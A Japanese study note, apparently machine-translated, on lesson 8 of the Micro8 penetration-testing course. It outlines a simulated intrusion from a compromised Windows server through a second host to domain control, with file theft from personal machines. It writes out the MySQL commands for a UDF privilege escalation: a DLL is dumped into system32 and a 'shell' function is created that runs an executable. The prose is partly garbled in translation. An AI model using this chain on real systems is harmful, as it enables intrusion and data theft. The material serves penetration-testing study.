このノートの元の本は、Micropoorの前身であるMicro8からのものです。ここでは、私が興味を持っている場所についてのみ、自分の学習ノートを取ります。
以下は8回目のレッスン
からですが、マスターは非常に明確に書いているので、ここではアイデアやその他の紹介のみを行います。
シミュレートされたアピール攻撃の概要
イベントプロセス:来年の会社の計画を取得し、今年の会社のレポートを取得し、会社の組織構造を調べます。収益性。
アイデア:ターゲットマスターステーション(win08 R2)シェルを取得し、情報を収集してから、2番目のサーバーを停止し、情報を収集し、ルート、MSF特権を読み取り、ドメイン制御とクロスセグメントサーバーのアクセス許可を取得し、個人にジャンプホストはファイルを取得します。
アイデア
ホスト情報、ポート、タスクリスト(tasklist、重要なタスクに注意を払う)、アカウントコレクション、重要なパスコレクション(将来必要になる可能性のあるダンプファイルの準備)、データベースのパスワードコレクション(将来の衝突の準備など)、ソフトの終了、管理者の習慣など
2番目のサーバーを取得した後、情報を収集した後、mysqlサービスがあることを確認し
、mysql ルート情報のルートハッシュを読み取ります。MySQL\ MySQL Server 5.0 \ data \ mysql \ user.MYD
。
実際の状況では、インタラクティブシェルの下でmysql -uroot -pxxxを実行すると、対話を続行できません。この問題を解決するには、パラメーターeが必要です。
mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
如果限制上传大小同样可以hex解决上传大小问题。
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';" mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"
msfを使用してコマンドの実行、転送などを行い、ドメイン制御のアクセス許可を取得し、セグメント間のサーバーのアクセス許可を取得し、パーソナルコンピューターをヒットしてファイルを取得します。
